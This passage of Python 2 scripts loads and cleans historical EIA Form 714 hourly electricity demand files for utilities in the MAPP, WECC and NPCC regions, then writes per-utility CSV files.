1998 : pd.read_fwf('%s/mapp/1998/MEAN98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MEAN99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MEAN02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MEAN03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13143 : {
1993 : pd.read_fwf('%s/mapp/1993/MPW93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/MPW94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MPW95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MPW96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MPW97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/MPW98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MPW99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MPW02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MPW03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13337 : {
1993 : pd.read_fwf('%s/mapp/1993/NPPD93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/NPPD94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/NPPD95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=6).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/NPPD96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/NPPD97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/NPPD98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/NPPD99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_fwf('%s/mapp/2000/NPPD00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=9, skipfooter=1).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2001 : pd.read_fwf('%s/mapp/2001/NPPD01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=9, skipfooter=1).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_csv('%s/mapp/2002/NPPD02' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/NPPD03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13781 : {
1993 : pd.read_fwf('%s/mapp/1993/NSP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/NSP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/NSP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/NSP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/NSP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/NSP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_csv('%s/mapp/2000/NSP00' % (fulldir), sep='\t', skipinitialspace=True, skiprows=2, header=None, skipfooter=1)[2].values
},
13809 : {
1993 : pd.read_fwf('%s/mapp/1993/NWPS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/NWPS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/NWPS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/NWPS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/NWPS98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/NWPS99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/NWPS02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/NWPS03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
14127 : {
1993 : pd.read_fwf('%s/mapp/1993/OPPD93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/OPPD94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_csv('%s/mapp/1995/OPPD95' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 7:].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/OPPD96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/OPPD97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/OPPD98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/OPPD99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/OPPD02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/OPPD03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
14232 : {
1993 : pd.read_fwf('%s/mapp/1993/OTP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/OTP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_csv('%s/mapp/1995/OTP95' % (fulldir), header=None).iloc[:, -2].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/OTP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/OTP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/OTP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/OTP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_fwf('%s/mapp/2000/OTP00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/OTP02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/OTP03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
40580 : {
1993 : pd.read_fwf('%s/mapp/1993/SMMP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/SMP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/SMMP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/SMMP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/SMMP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/SMMPA99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_csv('%s/mapp/2000/SMMP00' % (fulldir)).iloc[:-1, 3].values,
2001 : pd.read_csv('%s/mapp/2001/SMMP01' % (fulldir), header=None).iloc[:, 2].values,
2002 : pd.read_fwf('%s/mapp/2002/SMMPA02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/SMMPA03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
19514 : {
1993 : pd.read_fwf('%s/mapp/1993/UPA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/UPA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/UPA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/UPA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/UPA98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
20858 : {
1993 : pd.read_fwf('%s/mapp/1993/WPPI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/WPPI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/WPPI96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_csv('%s/mapp/1997/WPPI97' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 2:-1].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/WPPI98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/WPPI99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/WPPI02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/WPPI03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
12341 : {
1995 : pd.read_fwf('%s/mapp/1995/MEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/MEC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MEC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_fwf('%s/mapp/2000/MEC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MEC02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MEC_ALL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].dropna().values.ravel()
},
4322 : {
1993 : pd.read_fwf('%s/mapp/1993/CP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/CP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/CP96' % (fulldir), header=None).iloc[:, 2:].values.ravel()
},
23333 : {
1993 : pd.read_fwf('%s/mapp/1993/MPSI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/MPSI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MPSI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
}
}
mapp[20858][1997] = np.repeat(np.nan, len(mapp[20858][1997]))
mapp[21352][1995][mapp[21352][1995] < 0] = 0
mapp[40580][2000] = np.repeat(np.nan, len(mapp[40580][2000]))
if not os.path.exists('./mapp'):
os.mkdir('mapp')
for k in mapp.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(mapp[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(mapp[k][i]))) for i in mapp[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./mapp/%s.csv' % k)
#################################
# WECC
#################################
import numpy as np
import pandas as pd
import os
import re
import datetime
import time
import pysal as ps
homedir = os.path.expanduser('~')
#basepath = '/home/akagi/Documents/EIA_form_data/wecc_form_714'
basepath = '%s/github/RIPS_kircheis/data/eia_form_714/active' % (homedir)
path_d = {
1993: '93WSCC1/WSCC',
1994: '94WSCC1/WSCC1994',
1995: '95WSCC1',
1996: '96WSCC1/WSCC1996',
1997: '97wscc1',
1998: '98WSCC1/WSCC1',
1999: '99WSCC1/WSCC1',
2000: '00WSCC1/WSCC1',
2001: '01WECC/WECC01/wecc01',
2002: 'WECCONE3/WECC One/WECC2002',
2003: 'WECC/WECC/WECC ONE/wecc03',
2004: 'WECC_2004/WECC/WECC One/ferc',
2006: 'form714-database_2006_2013/form714-database/Part 3 Schedule 2 - Planning Area Hourly Demand.csv'
}
#### GET UNIQUE UTILITIES AND UTILITIES BY YEAR
u_by_year = {}
for d in path_d:
if d != 2006:
full_d = basepath + '/' + path_d[d]
l = [i.lower().split('.')[0][:-2] for i in os.listdir(full_d) if i.lower().endswith('dat')]
u_by_year.update({d : sorted(l)})
unique_u = np.unique(np.concatenate([np.array(i) for i in u_by_year.values()]))
#### GET EIA CODES OF WECC UTILITIES
rm_d = {1993: {'rm': '93WSCC1/README2'},
1994: {'rm': '94WSCC1/README.TXT'},
1995: {'rm': '95WSCC1/README.TXT'},
1996: {'rm': '96WSCC1/README.TXT'},
1997: {'rm': '97wscc1/README.TXT'},
1998: {'rm': '98WSCC1/WSCC1/part.002'},
1999: {'rm': '99WSCC1/WSCC1/README.TXT'},
2000: {'rm': '00WSCC1/WSCC1/README.TXT'},
2001: {'rm': '01WECC/WECC01/wecc01/README.TXT'},
2002: {'rm': 'WECCONE3/WECC One/WECC2002/README.TXT'},
2003: {'rm': 'WECC/WECC/WECC ONE/wecc03/README.TXT'},
2004: {'rm': 'WECC_2004/WECC/WECC One/ferc/README.TXT'}}
for d in rm_d.keys():
fn = basepath + '/' + rm_d[d]['rm']
f = open(fn, 'r')
r = f.readlines()
f.close()
for i in range(len(r)):
if 'FILE NAME' in r[i]:
rm_d[d].update({'op': i})
if 'FERC' and 'not' in r[i]:
rm_d[d].update({'ed': i})
unique_u_ids = {}
for u in unique_u:
regex = re.compile('^ *%s\d\d.dat' % u, re.IGNORECASE)
for d in rm_d.keys():
fn = basepath + '/' + rm_d[d]['rm']
f = open(fn, 'r')
r = f.readlines() #[rm_d[d]['op']:rm_d[d]['ed']]
f.close()
for line in r:
result = re.search(regex, line)
if result:
# print line
code = line.split()[1]
nm = line.split(code)[1].strip()
unique_u_ids.update({u : {'code':code, 'name':nm}})
break
else:
continue
if u in unique_u_ids:
break
else:
continue
#id_2006 = pd.read_csv('/home/akagi/Documents/EIA_form_data/wecc_form_714/form714-database_2006_2013/form714-database/Respondent IDs.csv')
id_2006 = pd.read_csv('%s/form714-database_2006_2013/form714-database/Respondent IDs.csv' % (basepath))
id_2006 = id_2006.drop_duplicates('eia_code').set_index('eia_code').sort_index()
ui = pd.DataFrame.from_dict(unique_u_ids, orient='index')
ui = ui.loc[ui['code'] != '*'].drop_duplicates('code')
ui['code'] = ui['code'].astype(int)
ui = ui.set_index('code')
eia_to_r = pd.concat([ui, id_2006], axis=1).dropna()
# util = {
# 'aps' : 803,
# 'srp' : 16572,
# 'ldwp' : 11208
# }
# util_2006 = {
# 'aps' : 116,
# 'srp' : 244,
# 'ldwp' : 194
# }
#resp_ids = '/home/akagi/Documents/EIA_form_data/wecc_form_714/form714-database_2006_2013/form714-database/Respondent IDs.csv'
resp_ids = '%s/form714-database_2006_2013/form714-database/Respondent IDs.csv' % (basepath)
df_path_d = {}
df_d = {}
build_paths()
#### Southern California Edison part of CAISO in 2006-2013: resp id 125
if not os.path.exists('./wecc'):
os.mkdir('wecc')
for x in unique_u:
out_df = build_df(x)
if x in unique_u_ids.keys():
if str.isdigit(unique_u_ids[x]['code']):
out_df.to_csv('./wecc/%s.csv' % unique_u_ids[x]['code'])
else:
out_df.to_csv('./wecc/%s.csv' % x)
else:
out_df.to_csv('./wecc/%s.csv' % x)
#################################
from itertools import chain
li = []
for fn in os.listdir('.'):
li.append(os.listdir('./%s' % (fn)))
s = pd.Series(list(chain(*li)))
s = s.str.replace('\.csv', '')
u = s[s.str.contains('\d+')].str.replace('[^\d]', '').astype(int).unique()
homedir = os.path.expanduser('~')
rid = pd.read_csv('%s/github/RIPS_kircheis/data/eia_form_714/active/form714-database/form714-database/Respondent IDs.csv' % homedir)
ridu = rid[rid['eia_code'] != 0]
ridu[~ridu['eia_code'].isin(u)]
| 91.005505 | 379 | 0.591062 | import numpy as np
import pandas as pd
import os
import datetime
homedir = os.path.expanduser('~')
datadir = 'github/RIPS_kircheis/data/eia_form_714/processed/'
fulldir = homedir + '/' + datadir
# li = []
# for d1 in os.listdir('.'):
# for fn in os.listdir('./%s' % d1):
# li.append(fn)
# dir_u = pd.Series(li).str[:-2].order().unique()
###### NPCC
# BECO: 54913 <- 1998
# BHE: 1179
# CELC: 1523 <- 2886
# CHGE: 3249
# CMP: 3266
# COED: 4226
# COEL: 4089 -> IGNORE
# CVPS: 3292
# EUA: 5618
# GMP: 7601
# ISONY: 13501
# LILC: 11171 <- 11172
# MMWE: 11806
# NEES: 13433
# NEPOOL: 13435
# NMPC: 13573
# NU: 13556
# NYPA: 15296
# NYPP: 13501
# NYS: 13511
# OR: 14154
# RGE: 16183
# UI: 19497
npcc = {
54913 : {
1993 : pd.read_fwf('%s/npcc/1993/BECO93' % (fulldir), header=None, skipfooter=1).loc[:, 2:].values.ravel(),
1994 : pd.read_csv('%s/npcc/1994/BECO94' % (fulldir), sep =' ', skipinitialspace=True, header=None, skipfooter=1)[4].values,
1995 : pd.read_csv('%s/npcc/1995/BECO95' % (fulldir), sep =' ', skipinitialspace=True, header=None)[4].values,
1996 : pd.read_csv('%s/npcc/1996/BECO96' % (fulldir), sep =' ', skipinitialspace=True, header=None)[4].values,
1997 : pd.read_csv('%s/npcc/1997/BECO97' % (fulldir), sep =' ', skipinitialspace=True, header=None, skipfooter=1)[4].values,
1998 : pd.read_csv('%s/npcc/1998/BECO98' % (fulldir), sep =' ', skipinitialspace=True, header=None)[4].values,
1999 : pd.read_csv('%s/npcc/1999/BECO99' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2000 : pd.read_csv('%s/npcc/2000/BECO00' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2001 : pd.read_csv('%s/npcc/2001/BECO01' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2002 : pd.read_csv('%s/npcc/2002/BECO02' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2003 : pd.read_csv('%s/npcc/2003/BECO03' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2004 : pd.read_csv('%s/npcc/2004/BECO04' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values
},
1179 : {
1993 : pd.read_csv('%s/npcc/1993/BHE93' % (fulldir), sep=' ', skiprows=2, skipinitialspace=True).loc[:, '0000':].values.ravel(),
1994 : pd.read_csv('%s/npcc/1994/BHE94' % (fulldir)).dropna(how='all').loc[:729, '1/13':'12/24'].values.ravel(),
1995 : (pd.read_fwf('%s/npcc/1995/BHE95' % (fulldir)).loc[:729, '1/13':'1224'].astype(float)/10).values.ravel(),
2001 : pd.read_excel('%s/npcc/2001/BHE01' % (fulldir), skiprows=2).iloc[:, 1:24].values.ravel(),
2003 : pd.read_excel('%s/npcc/2003/BHE03' % (fulldir), skiprows=3).iloc[:, 1:24].values.ravel()
},
1523 : {
1999 : pd.read_csv('%s/npcc/1999/CELC99' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2000 : pd.read_csv('%s/npcc/2000/CELC00' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2001 : pd.read_csv('%s/npcc/2001/CELC01' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2002 : pd.read_csv('%s/npcc/2002/CELC02' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2003 : pd.read_csv('%s/npcc/2003/CELC03' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
2004 : pd.read_csv('%s/npcc/2004/CELC04' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values
},
3249 : {
1993 : pd.read_csv('%s/npcc/1993/CHGE93' % (fulldir), sep =' ', skipinitialspace=True, header=None, skipfooter=1)[2].values,
